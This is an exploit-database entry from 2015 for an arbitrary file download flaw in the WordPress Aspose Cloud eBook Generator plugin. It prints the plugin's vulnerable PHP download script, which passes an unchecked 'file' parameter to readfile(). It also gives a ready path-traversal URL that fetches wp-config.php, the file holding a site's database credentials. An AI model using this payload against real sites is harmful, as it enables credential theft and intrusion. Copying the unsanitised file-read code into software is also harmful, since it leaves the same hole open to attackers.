WordPress Aspose Cloud eBook Generator File Download Vulnerability

2015-03-28T00:00:00
ID 1337DAY-ID-23452
Type zdt
Reporter Acc3ss
Modified 2015-03-28T00:00:00

Description

WordPress Aspose Cloud eBook Generator plugin suffers from an arbitrary file download vulnerability.

                                        
                                            |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
  |-------------------------------------------------------------------------|
  | [+] Exploit Title:Wordpress Aspose-Cloud-eBook-Generator Plugin  
Arbitrary File Download Vulnerability |
  | [+] Exploit Author: Ashiyane Digital Security Team |
  | [+] Vendor Homepage :  
https://wordpress.org/plugins/aspose-cloud-ebook-generator/
  | [+] Download Link :  
https://downloads.wordpress.org/plugin/aspose-cloud-ebook-generator.zip
  | [+] Tested on: Windows,Linux |
  | [+] Discovered By : ACC3SS
  |-------------------------------------------------------------------------|
  | [+] Exploit: |
  | [+] Vulnerable file :  
http://localhost/wordpress/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php  
|
  | [+] Vulnerable Code :

<?php

$file = $_GET['file'];

$file_arr = explode('/',$file);

$file_name = $file_arr[count($file_arr) - 1];

header ("Content-type: octet/stream");

header ("Content-disposition: attachment; filename=".$file_name.";");

header("Content-Length: ".filesize($file));

readfile($file);

exit;

?>

  | [+]  
http://localhost/wordpress/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=[File  
Address]
  | [+]
  | [+] Examples :  
http://localhost/wordpress/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php
  |-------------------------------------------------------------------------|
  |*||*||*||*||*||*||*||*||*||*||*||*||*

#  0day.today [2018-01-01]  #